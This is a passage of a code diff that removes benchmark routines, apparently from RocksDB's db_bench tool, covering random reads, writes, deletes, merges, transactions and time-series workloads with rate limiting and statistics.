-        bytes += iter_to_use->key().size() + iter_to_use->value().size();
-
-        if (!FLAGS_reverse_iterator) {
-          iter_to_use->Next();
-        } else {
-          iter_to_use->Prev();
-        }
-        assert(iter_to_use->status().ok());
-      }
-
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          read % 256 == 255) {
-        thread->shared->read_rate_limiter->Request(
-            256, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-
-      thread->stats.FinishedOps(&db_, db_.db, 1, kSeek);
-    }
-    delete single_iter;
-    for (auto iter : multi_iters) {
-      delete iter;
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)\n",
-             found, read);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  void SeekRandomWhileWriting(ThreadState* thread) {
-    if (thread->tid > 0) {
-      SeekRandom(thread);
-    } else {
-      BGWriter(thread, kWrite);
-    }
-  }
-
-  void SeekRandomWhileMerging(ThreadState* thread) {
-    if (thread->tid > 0) {
-      SeekRandom(thread);
-    } else {
-      BGWriter(thread, kMerge);
-    }
-  }
-
-  void DoDelete(ThreadState* thread, bool seq) {
-    WriteBatch batch;
-    Duration duration(seq ? 0 : FLAGS_duration, deletes_);
-    int64_t i = 0;
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    while (!duration.Done(entries_per_batch_)) {
-      DB* db = SelectDB(thread);
-      batch.Clear();
-      for (int64_t j = 0; j < entries_per_batch_; ++j) {
-        const int64_t k = seq ? i + j : (thread->rand.Next() % FLAGS_num);
-        GenerateKeyFromInt(k, FLAGS_num, &key);
-        batch.Delete(key);
-      }
-      auto s = db->Write(write_options_, &batch);
-      thread->stats.FinishedOps(nullptr, db, entries_per_batch_, kDelete);
-      if (!s.ok()) {
-        fprintf(stderr, "del error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      i += entries_per_batch_;
-    }
-  }
-
-  void DeleteSeq(ThreadState* thread) {
-    DoDelete(thread, true);
-  }
-
-  void DeleteRandom(ThreadState* thread) {
-    DoDelete(thread, false);
-  }
-
-  void ReadWhileWriting(ThreadState* thread) {
-    if (thread->tid > 0) {
-      ReadRandom(thread);
-    } else {
-      BGWriter(thread, kWrite);
-    }
-  }
-
-  void ReadWhileMerging(ThreadState* thread) {
-    if (thread->tid > 0) {
-      ReadRandom(thread);
-    } else {
-      BGWriter(thread, kMerge);
-    }
-  }
-
-  void BGWriter(ThreadState* thread, enum OperationType write_merge) {
-    // Special thread that keeps writing until other threads are done.
-    RandomGenerator gen;
-    int64_t bytes = 0;
-
-    std::unique_ptr<RateLimiter> write_rate_limiter;
-    if (FLAGS_benchmark_write_rate_limit > 0) {
-      write_rate_limiter.reset(
-          NewGenericRateLimiter(FLAGS_benchmark_write_rate_limit));
-    }
-
-    // Don't merge stats from this thread with the readers.
-    thread->stats.SetExcludeFromMerge();
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    uint32_t written = 0;
-    bool hint_printed = false;
-
-    while (true) {
-      DB* db = SelectDB(thread);
-      {
-        MutexLock l(&thread->shared->mu);
-        if (FLAGS_finish_after_writes && written == writes_) {
-          fprintf(stderr, "Exiting the writer after %u writes...\n", written);
-          break;
-        }
-        if (thread->shared->num_done + 1 >= thread->shared->num_initialized) {
-          // Other threads have finished
-          if (FLAGS_finish_after_writes) {
-            // Wait for the writes to be finished
-            if (!hint_printed) {
-              fprintf(stderr, "Reads are finished. Have %d more writes to do\n",
-                      (int)writes_ - written);
-              hint_printed = true;
-            }
-          } else {
-            // Finish the write immediately
-            break;
-          }
-        }
-      }
-
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-      Status s;
-
-      if (write_merge == kWrite) {
-        s = db->Put(write_options_, key, gen.Generate(value_size_));
-      } else {
-        s = db->Merge(write_options_, key, gen.Generate(value_size_));
-      }
-      written++;
-
-      if (!s.ok()) {
-        fprintf(stderr, "put or merge error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value_size_;
-      thread->stats.FinishedOps(&db_, db_.db, 1, kWrite);
-
-      if (FLAGS_benchmark_write_rate_limit > 0) {
-        write_rate_limiter->Request(
-            entries_per_batch_ * (value_size_ + key_size_), Env::IO_HIGH,
-            nullptr /* stats */, RateLimiter::OpType::kWrite);
-      }
-    }
-    thread->stats.AddBytes(bytes);
-  }
-
-  // Given a key K and value V, this puts (K+"0", V), (K+"1", V), (K+"2", V)
-  // in DB atomically i.e in a single batch. Also refer GetMany.
-  Status PutMany(DB* db, const WriteOptions& writeoptions, const Slice& key,
-                 const Slice& value) {
-    std::string suffixes[3] = {"2", "1", "0"};
-    std::string keys[3];
-
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 3; i++) {
-      keys[i] = key.ToString() + suffixes[i];
-      batch.Put(keys[i], value);
-    }
-
-    s = db->Write(writeoptions, &batch);
-    return s;
-  }
-
-
-  // Given a key K, this deletes (K+"0", V), (K+"1", V), (K+"2", V)
-  // in DB atomically i.e in a single batch. Also refer GetMany.
-  Status DeleteMany(DB* db, const WriteOptions& writeoptions,
-                    const Slice& key) {
-    std::string suffixes[3] = {"1", "2", "0"};
-    std::string keys[3];
-
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 3; i++) {
-      keys[i] = key.ToString() + suffixes[i];
-      batch.Delete(keys[i]);
-    }
-
-    s = db->Write(writeoptions, &batch);
-    return s;
-  }
-
-  // Given a key K and value V, this gets values for K+"0", K+"1" and K+"2"
-  // in the same snapshot, and verifies that all the values are identical.
-  // ASSUMES that PutMany was used to put (K, V) into the DB.
-  Status GetMany(DB* db, const ReadOptions& readoptions, const Slice& key,
-                 std::string* value) {
-    std::string suffixes[3] = {"0", "1", "2"};
-    std::string keys[3];
-    Slice key_slices[3];
-    std::string values[3];
-    ReadOptions readoptionscopy = readoptions;
-    readoptionscopy.snapshot = db->GetSnapshot();
-    Status s;
-    for (int i = 0; i < 3; i++) {
-      keys[i] = key.ToString() + suffixes[i];
-      key_slices[i] = keys[i];
-      s = db->Get(readoptionscopy, key_slices[i], value);
-      if (!s.ok() && !s.IsNotFound()) {
-        fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-        values[i] = "";
-        // we continue after error rather than exiting so that we can
-        // find more errors if any
-      } else if (s.IsNotFound()) {
-        values[i] = "";
-      } else {
-        values[i] = *value;
-      }
-    }
-    db->ReleaseSnapshot(readoptionscopy.snapshot);
-
-    if ((values[0] != values[1]) || (values[1] != values[2])) {
-      fprintf(stderr, "inconsistent values for key %s: %s, %s, %s\n",
-              key.ToString().c_str(), values[0].c_str(), values[1].c_str(),
-              values[2].c_str());
-      // we continue after error rather than exiting so that we can
-      // find more errors if any
-    }
-
-    return s;
-  }
-
-  // Differs from readrandomwriterandom in the following ways:
-  // (a) Uses GetMany/PutMany to read/write key values. Refer to those funcs.
-  // (b) Does deletes as well (per FLAGS_deletepercent)
-  // (c) In order to achieve high % of 'found' during lookups, and to do
-  //     multiple writes (including puts and deletes) it uses upto
-  //     FLAGS_numdistinct distinct keys instead of FLAGS_num distinct keys.
-  // (d) Does not have a MultiGet option.
-  void RandomWithVerify(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int get_weight = 0;
-    int put_weight = 0;
-    int delete_weight = 0;
-    int64_t gets_done = 0;
-    int64_t puts_done = 0;
-    int64_t deletes_done = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    // the number of iterations is the larger of read_ or write_
-    for (int64_t i = 0; i < readwrites_; i++) {
-      DB* db = SelectDB(thread);
-      if (get_weight == 0 && put_weight == 0 && delete_weight == 0) {
-        // one batch completed, reinitialize for next batch
-        get_weight = FLAGS_readwritepercent;
-        delete_weight = FLAGS_deletepercent;
-        put_weight = 100 - get_weight - delete_weight;
-      }
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_numdistinct,
-          FLAGS_numdistinct, &key);
-      if (get_weight > 0) {
-        // do all the gets first
-        Status s = GetMany(db, options, key, &value);
-        if (!s.ok() && !s.IsNotFound()) {
-          fprintf(stderr, "getmany error: %s\n", s.ToString().c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        } else if (!s.IsNotFound()) {
-          found++;
-        }
-        get_weight--;
-        gets_done++;
-        thread->stats.FinishedOps(&db_, db_.db, 1, kRead);
-      } else if (put_weight > 0) {
-        // then do all the corresponding number of puts
-        // for all the gets we have done earlier
-        Status s = PutMany(db, write_options_, key, gen.Generate(value_size_));
-        if (!s.ok()) {
-          fprintf(stderr, "putmany error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        put_weight--;
-        puts_done++;
-        thread->stats.FinishedOps(&db_, db_.db, 1, kWrite);
-      } else if (delete_weight > 0) {
-        Status s = DeleteMany(db, write_options_, key);
-        if (!s.ok()) {
-          fprintf(stderr, "deletemany error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        delete_weight--;
-        deletes_done++;
-        thread->stats.FinishedOps(&db_, db_.db, 1, kDelete);
-      }
-    }
-    char msg[128];
-    snprintf(msg, sizeof(msg),
-             "( get:%" PRIu64 " put:%" PRIu64 " del:%" PRIu64 " total:%" \
-             PRIu64 " found:%" PRIu64 ")",
-             gets_done, puts_done, deletes_done, readwrites_, found);
-    thread->stats.AddMessage(msg);
-  }
-
-  // This is different from ReadWhileWriting because it does not use
-  // an extra thread.
-  void ReadRandomWriteRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int get_weight = 0;
-    int put_weight = 0;
-    int64_t reads_done = 0;
-    int64_t writes_done = 0;
-    Duration duration(FLAGS_duration, readwrites_);
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    // the number of iterations is the larger of read_ or write_
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-      if (get_weight == 0 && put_weight == 0) {
-        // one batch completed, reinitialize for next batch
-        get_weight = FLAGS_readwritepercent;
-        put_weight = 100 - get_weight;
-      }
-      if (get_weight > 0) {
-        // do all the gets first
-        Status s = db->Get(options, key, &value);
-        if (!s.ok() && !s.IsNotFound()) {
-          fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        } else if (!s.IsNotFound()) {
-          found++;
-        }
-        get_weight--;
-        reads_done++;
-        thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      } else  if (put_weight > 0) {
-        // then do all the corresponding number of puts
-        // for all the gets we have done earlier
-        Status s = db->Put(write_options_, key, gen.Generate(value_size_));
-        if (!s.ok()) {
-          fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        put_weight--;
-        writes_done++;
-        thread->stats.FinishedOps(nullptr, db, 1, kWrite);
-      }
-    }
-    char msg[100];
-    snprintf(msg, sizeof(msg), "( reads:%" PRIu64 " writes:%" PRIu64 \
-             " total:%" PRIu64 " found:%" PRIu64 ")",
-             reads_done, writes_done, readwrites_, found);
-    thread->stats.AddMessage(msg);
-  }
-
-  //
-  // Read-modify-write for random keys
-  void UpdateRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int64_t bytes = 0;
-    Duration duration(FLAGS_duration, readwrites_);
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // the number of iterations is the larger of read_ or write_
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-
-      auto status = db->Get(options, key, &value);
-      if (status.ok()) {
-        ++found;
-        bytes += key.size() + value.size();
-      } else if (!status.IsNotFound()) {
-        fprintf(stderr, "Get returned an error: %s\n",
-                status.ToString().c_str());
-        abort();
-      }
-
-      if (thread->shared->write_rate_limiter) {
-        thread->shared->write_rate_limiter->Request(
-            key.size() + value_size_, Env::IO_HIGH, nullptr /*stats*/,
-            RateLimiter::OpType::kWrite);
-      }
-
-      Status s = db->Put(write_options_, key, gen.Generate(value_size_));
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value_size_;
-      thread->stats.FinishedOps(nullptr, db, 1, kUpdate);
-    }
-    char msg[100];
-    snprintf(msg, sizeof(msg),
-             "( updates:%" PRIu64 " found:%" PRIu64 ")", readwrites_, found);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-  }
-
-  // Read-modify-write for random keys.
-  // Each operation causes the key grow by value_size (simulating an append).
-  // Generally used for benchmarking against merges of similar type
-  void AppendRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int64_t bytes = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // The number of iterations is the larger of read_ or write_
-    Duration duration(FLAGS_duration, readwrites_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-
-      auto status = db->Get(options, key, &value);
-      if (status.ok()) {
-        ++found;
-        bytes += key.size() + value.size();
-      } else if (!status.IsNotFound()) {
-        fprintf(stderr, "Get returned an error: %s\n",
-                status.ToString().c_str());
-        abort();
-      } else {
-        // If not existing, then just assume an empty string of data
-        value.clear();
-      }
-
-      // Update the value (by appending data)
-      Slice operand = gen.Generate(value_size_);
-      if (value.size() > 0) {
-        // Use a delimiter to match the semantics for StringAppendOperator
-        value.append(1,',');
-      }
-      value.append(operand.data(), operand.size());
-
-      // Write back to the database
-      Status s = db->Put(write_options_, key, value);
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value.size();
-      thread->stats.FinishedOps(nullptr, db, 1, kUpdate);
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "( updates:%" PRIu64 " found:%" PRIu64 ")",
-            readwrites_, found);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-  }
-
-  // Read-modify-write for random keys (using MergeOperator)
-  // The merge operator to use should be defined by FLAGS_merge_operator
-  // Adjust FLAGS_value_size so that the keys are reasonable for this operator
-  // Assumes that the merge operator is non-null (i.e.: is well-defined)
-  //
-  // For example, use FLAGS_merge_operator="uint64add" and FLAGS_value_size=8
-  // to simulate random additions over 64-bit integers using merge.
-  //
-  // The number of merges on the same key can be controlled by adjusting
-  // FLAGS_merge_keys.
-  void MergeRandom(ThreadState* thread) {
-    RandomGenerator gen;
-    int64_t bytes = 0;
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // The number of iterations is the larger of read_ or write_
-    Duration duration(FLAGS_duration, readwrites_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % merge_keys_, merge_keys_, &key);
-
-      Status s = db->Merge(write_options_, key, gen.Generate(value_size_));
-
-      if (!s.ok()) {
-        fprintf(stderr, "merge error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value_size_;
-      thread->stats.FinishedOps(nullptr, db, 1, kMerge);
-    }
-
-    // Print some statistics
-    char msg[100];
-    snprintf(msg, sizeof(msg), "( updates:%" PRIu64 ")", readwrites_);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-  }
-
-  // Read and merge random keys. The amount of reads and merges are controlled
-  // by adjusting FLAGS_num and FLAGS_mergereadpercent. The number of distinct
-  // keys (and thus also the number of reads and merges on the same key) can be
-  // adjusted with FLAGS_merge_keys.
-  //
-  // As with MergeRandom, the merge operator to use should be defined by
-  // FLAGS_merge_operator.
-  void ReadRandomMergeRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t num_hits = 0;
-    int64_t num_gets = 0;
-    int64_t num_merges = 0;
-    size_t max_length = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // the number of iterations is the larger of read_ or write_
-    Duration duration(FLAGS_duration, readwrites_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % merge_keys_, merge_keys_, &key);
-
-      bool do_merge = int(thread->rand.Next() % 100) < FLAGS_mergereadpercent;
-
-      if (do_merge) {
-        Status s = db->Merge(write_options_, key, gen.Generate(value_size_));
-        if (!s.ok()) {
-          fprintf(stderr, "merge error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        num_merges++;
-        thread->stats.FinishedOps(nullptr, db, 1, kMerge);
-      } else {
-        Status s = db->Get(options, key, &value);
-        if (value.length() > max_length)
-          max_length = value.length();
-
-        if (!s.ok() && !s.IsNotFound()) {
-          fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        } else if (!s.IsNotFound()) {
-          num_hits++;
-        }
-        num_gets++;
-        thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      }
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg),
-             "(reads:%" PRIu64 " merges:%" PRIu64 " total:%" PRIu64
-             " hits:%" PRIu64 " maxlength:%" ROCKSDB_PRIszt ")",
-             num_gets, num_merges, readwrites_, num_hits, max_length);
-    thread->stats.AddMessage(msg);
-  }
-
-  void WriteSeqSeekSeq(ThreadState* thread) {
-    writes_ = FLAGS_num;
-    DoWrite(thread, SEQUENTIAL);
-    // exclude writes from the ops/sec calculation
-    thread->stats.Start(thread->tid);
-
-    DB* db = SelectDB(thread);
-    std::unique_ptr<Iterator> iter(
-      db->NewIterator(ReadOptions(FLAGS_verify_checksum, true)));
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    for (int64_t i = 0; i < FLAGS_num; ++i) {
-      GenerateKeyFromInt(i, FLAGS_num, &key);
-      iter->Seek(key);
-      assert(iter->Valid() && iter->key() == key);
-      thread->stats.FinishedOps(nullptr, db, 1, kSeek);
-
-      for (int j = 0; j < FLAGS_seek_nexts && i + 1 < FLAGS_num; ++j) {
-        if (!FLAGS_reverse_iterator) {
-          iter->Next();
-        } else {
-          iter->Prev();
-        }
-        GenerateKeyFromInt(++i, FLAGS_num, &key);
-        assert(iter->Valid() && iter->key() == key);
-        thread->stats.FinishedOps(nullptr, db, 1, kSeek);
-      }
-
-      iter->Seek(key);
-      assert(iter->Valid() && iter->key() == key);
-      thread->stats.FinishedOps(nullptr, db, 1, kSeek);
-    }
-  }
-
-#ifndef ROCKSDB_LITE
-  // This benchmark stress tests Transactions.  For a given --duration (or
-  // total number of --writes, a Transaction will perform a read-modify-write
-  // to increment the value of a key in each of N(--transaction-sets) sets of
-  // keys (where each set has --num keys).  If --threads is set, this will be
-  // done in parallel.
-  //
-  // To test transactions, use --transaction_db=true.  Not setting this
-  // parameter
-  // will run the same benchmark without transactions.
-  //
-  // RandomTransactionVerify() will then validate the correctness of the results
-  // by checking if the sum of all keys in each set is the same.
-  void RandomTransaction(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    Duration duration(FLAGS_duration, readwrites_);
-    ReadOptions read_options(FLAGS_verify_checksum, true);
-    uint16_t num_prefix_ranges = static_cast<uint16_t>(FLAGS_transaction_sets);
-    uint64_t transactions_done = 0;
-
-    if (num_prefix_ranges == 0 || num_prefix_ranges > 9999) {
-      fprintf(stderr, "invalid value for transaction_sets\n");
-      abort();
-    }
-
-    TransactionOptions txn_options;
-    txn_options.lock_timeout = FLAGS_transaction_lock_timeout;
-    txn_options.set_snapshot = FLAGS_transaction_set_snapshot;
-
-    RandomTransactionInserter inserter(&thread->rand, write_options_,
-                                       read_options, FLAGS_num,
-                                       num_prefix_ranges);
-
-    if (FLAGS_num_multi_db > 1) {
-      fprintf(stderr,
-              "Cannot run RandomTransaction benchmark with "
-              "FLAGS_multi_db > 1.");
-      abort();
-    }
-
-    while (!duration.Done(1)) {
-      bool success;
-
-      // RandomTransactionInserter will attempt to insert a key for each
-      // # of FLAGS_transaction_sets
-      if (FLAGS_optimistic_transaction_db) {
-        success = inserter.OptimisticTransactionDBInsert(db_.opt_txn_db);
-      } else if (FLAGS_transaction_db) {
-        TransactionDB* txn_db = reinterpret_cast<TransactionDB*>(db_.db);
-        success = inserter.TransactionDBInsert(txn_db, txn_options);
-      } else {
-        success = inserter.DBInsert(db_.db);
-      }
-
-      if (!success) {
-        fprintf(stderr, "Unexpected error: %s\n",
-                inserter.GetLastStatus().ToString().c_str());
-        abort();
-      }
-
-      thread->stats.FinishedOps(nullptr, db_.db, 1, kOthers);
-      transactions_done++;
-    }
-
-    char msg[100];
-    if (FLAGS_optimistic_transaction_db || FLAGS_transaction_db) {
-      snprintf(msg, sizeof(msg),
-               "( transactions:%" PRIu64 " aborts:%" PRIu64 ")",
-               transactions_done, inserter.GetFailureCount());
-    } else {
-      snprintf(msg, sizeof(msg), "( batches:%" PRIu64 " )", transactions_done);
-    }
-    thread->stats.AddMessage(msg);
-
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  // Verifies consistency of data after RandomTransaction() has been run.
-  // Since each iteration of RandomTransaction() incremented a key in each set
-  // by the same value, the sum of the keys in each set should be the same.
-  void RandomTransactionVerify() {
-    if (!FLAGS_transaction_db && !FLAGS_optimistic_transaction_db) {
-      // transactions not used, nothing to verify.
-      return;
-    }
-
-    Status s =
-        RandomTransactionInserter::Verify(db_.db,
-                            static_cast<uint16_t>(FLAGS_transaction_sets));
-
-    if (s.ok()) {
-      fprintf(stdout, "RandomTransactionVerify Success.\n");
-    } else {
-      fprintf(stdout, "RandomTransactionVerify FAILED!!\n");
-    }
-  }
-#endif  // ROCKSDB_LITE
-
-  // Writes and deletes random keys without overwriting keys.
-  //
-  // This benchmark is intended to partially replicate the behavior of MyRocks
-  // secondary indices: All data is stored in keys and updates happen by
-  // deleting the old version of the key and inserting the new version.
-  void RandomReplaceKeys(ThreadState* thread) {
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    std::vector<uint32_t> counters(FLAGS_numdistinct, 0);
-    size_t max_counter = 50;
-    RandomGenerator gen;
-
-    Status s;
-    DB* db = SelectDB(thread);
-    for (int64_t i = 0; i < FLAGS_numdistinct; i++) {
-      GenerateKeyFromInt(i * max_counter, FLAGS_num, &key);
-      s = db->Put(write_options_, key, gen.Generate(value_size_));
-      if (!s.ok()) {
-        fprintf(stderr, "Operation failed: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-    }
-
-    db->GetSnapshot();
-
-    std::default_random_engine generator;
-    std::normal_distribution<double> distribution(FLAGS_numdistinct / 2.0,
-                                                  FLAGS_stddev);
-    Duration duration(FLAGS_duration, FLAGS_num);
-    while (!duration.Done(1)) {
-      int64_t rnd_id = static_cast<int64_t>(distribution(generator));
-      int64_t key_id = std::max(std::min(FLAGS_numdistinct - 1, rnd_id),
-                                static_cast<int64_t>(0));
-      GenerateKeyFromInt(key_id * max_counter + counters[key_id], FLAGS_num,
-                         &key);
-      s = FLAGS_use_single_deletes ? db->SingleDelete(write_options_, key)
-                                   : db->Delete(write_options_, key);
-      if (s.ok()) {
-        counters[key_id] = (counters[key_id] + 1) % max_counter;
-        GenerateKeyFromInt(key_id * max_counter + counters[key_id], FLAGS_num,
-                           &key);
-        s = db->Put(write_options_, key, Slice());
-      }
-
-      if (!s.ok()) {
-        fprintf(stderr, "Operation failed: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-
-      thread->stats.FinishedOps(nullptr, db, 1, kOthers);
-    }
-
-    char msg[200];
-    snprintf(msg, sizeof(msg),
-             "use single deletes: %d, "
-             "standard deviation: %lf\n",
-             FLAGS_use_single_deletes, FLAGS_stddev);
-    thread->stats.AddMessage(msg);
-  }
-
-  void TimeSeriesReadOrDelete(ThreadState* thread, bool do_deletion) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t bytes = 0;
-
-    Iterator* iter = nullptr;
-    // Only work on single database
-    assert(db_.db != nullptr);
-    iter = db_.db->NewIterator(options);
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    char value_buffer[256];
-    while (true) {
-      {
-        MutexLock l(&thread->shared->mu);
-        if (thread->shared->num_done >= 1) {
-          // Write thread have finished
-          break;
-        }
-      }
-      if (!FLAGS_use_tailing_iterator) {
-        delete iter;
-        iter = db_.db->NewIterator(options);
-      }
-      // Pick a Iterator to use
-
-      int64_t key_id = thread->rand.Next() % FLAGS_key_id_range;
-      GenerateKeyFromInt(key_id, FLAGS_num, &key);
-      // Reset last 8 bytes to 0
-      char* start = const_cast<char*>(key.data());
-      start += key.size() - 8;
-      memset(start, 0, 8);
-      ++read;
-
-      bool key_found = false;
-      // Seek the prefix
-      for (iter->Seek(key); iter->Valid() && iter->key().starts_with(key);
-           iter->Next()) {
-        key_found = true;
-        // Copy out iterator's value to make sure we read them.
-        if (do_deletion) {
-          bytes += iter->key().size();
-          if (KeyExpired(timestamp_emulator_.get(), iter->key())) {
-            thread->stats.FinishedOps(&db_, db_.db, 1, kDelete);
-            db_.db->Delete(write_options_, iter->key());
-          } else {
-            break;
-          }
-        } else {
-          bytes += iter->key().size() + iter->value().size();
-          thread->stats.FinishedOps(&db_, db_.db, 1, kRead);
-          Slice value = iter->value();
-          memcpy(value_buffer, value.data(),
-                 std::min(value.size(), sizeof(value_buffer)));
-
-          assert(iter->status().ok());
-        }
-      }
-      found += key_found;
-
-      if (thread->shared->read_rate_limiter.get() != nullptr) {
-        thread->shared->read_rate_limiter->Request(
-            1, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-    }
-    delete iter;
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)", found,
-             read);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  void TimeSeriesWrite(ThreadState* thread) {
-    // Special thread that keeps writing until other threads are done.
-    RandomGenerator gen;
-    int64_t bytes = 0;
-
-    // Don't merge stats from this thread with the readers.
-    thread->stats.SetExcludeFromMerge();
-
-    std::unique_ptr<RateLimiter> write_rate_limiter;
-    if (FLAGS_benchmark_write_rate_limit > 0) {
-      write_rate_limiter.reset(
-          NewGenericRateLimiter(FLAGS_benchmark_write_rate_limit));
-    }
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    Duration duration(FLAGS_duration, writes_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-
-      uint64_t key_id = thread->rand.Next() % FLAGS_key_id_range;
-      // Write key id
-      GenerateKeyFromInt(key_id, FLAGS_num, &key);
-      // Write timestamp
-
-      char* start = const_cast<char*>(key.data());
-      char* pos = start + 8;
-      int bytes_to_fill =
-          std::min(key_size_ - static_cast<int>(pos - start), 8);
-      uint64_t timestamp_value = timestamp_emulator_->Get();
-      if (port::kLittleEndian) {
-        for (int i = 0; i < bytes_to_fill; ++i) {
-          pos[i] = (timestamp_value >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-        }
-      } else {
-        memcpy(pos, static_cast<void*>(&timestamp_value), bytes_to_fill);
-      }
-
-      timestamp_emulator_->Inc();
-
-      Status s;
-
-      s = db->Put(write_options_, key, gen.Generate(value_size_));
-
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes = key.size() + value_size_;
-      thread->stats.FinishedOps(&db_, db_.db, 1, kWrite);
-      thread->stats.AddBytes(bytes);
-
-      if (FLAGS_benchmark_write_rate_limit > 0) {
-        write_rate_limiter->Request(
-            entries_per_batch_ * (value_size_ + key_size_), Env::IO_HIGH,
-            nullptr /* stats */, RateLimiter::OpType::kWrite);
-      }
-    }
-  }
-
-  void TimeSeries(ThreadState* thread) {
-    if (thread->tid > 0) {
-      bool do_deletion = FLAGS_expire_style == "delete" &&
-                         thread->tid <= FLAGS_num_deletion_threads;
-      TimeSeriesReadOrDelete(thread, do_deletion);
-    } else {
-      TimeSeriesWrite(thread);
-      thread->stats.Stop();
-      thread->stats.Report("timeseries write");
-    }
-  }
-
-  void Compact(ThreadState* thread) {
-    DB* db = SelectDB(thread);
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  }
-
-  void CompactAll() {
-    if (db_.db != nullptr) {
-      db_.db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-    for (const auto& db_with_cfh : multi_dbs_) {
-      db_with_cfh.db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-  }
-
-  void ResetStats() {
-    if (db_.db != nullptr) {
-      db_.db->ResetStats();
-    }
